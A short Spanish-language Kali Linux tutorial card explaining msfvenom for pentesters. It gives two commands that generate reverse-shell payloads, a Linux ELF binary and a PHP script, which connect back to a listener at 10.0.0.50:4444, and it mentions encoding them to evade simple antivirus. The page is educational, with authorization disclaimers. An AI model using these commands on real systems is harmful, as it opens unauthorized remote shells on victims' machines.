KALI
Payloads con msfvenom
msfvenom fabrica el payload que le entregas a la víctima, en el formato que necesites.
Le das el tipo de shell, tu IP y puerto de escucha, y el formato de salida: un binario de Linux, un php, un script de python, o un war para un servidor Java. También puede codificarlo para evadir antivirus simples.
El payload se conecta de vuelta a tu Metasploit. Es la fábrica de munición del pentester.
Solo en laboratorios o con autorización.
# los comandos
kali@kali:~$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.0.0.50 LPORT=4444 -f elf -o shellcopiarPayload size: 74 bytes
Saved as: shell
kali@kali:~$ msfvenom -p php/reverse_php LHOST=10.0.0.50 LPORT=4444 -f raw -o shell.phpcopiarSolo con permiso. Esto se muestra con fines educativos y defensivos: úsalo únicamente en sistemas propios o donde tengas autorización. Entender el ataque es lo que te permite defenderte de él.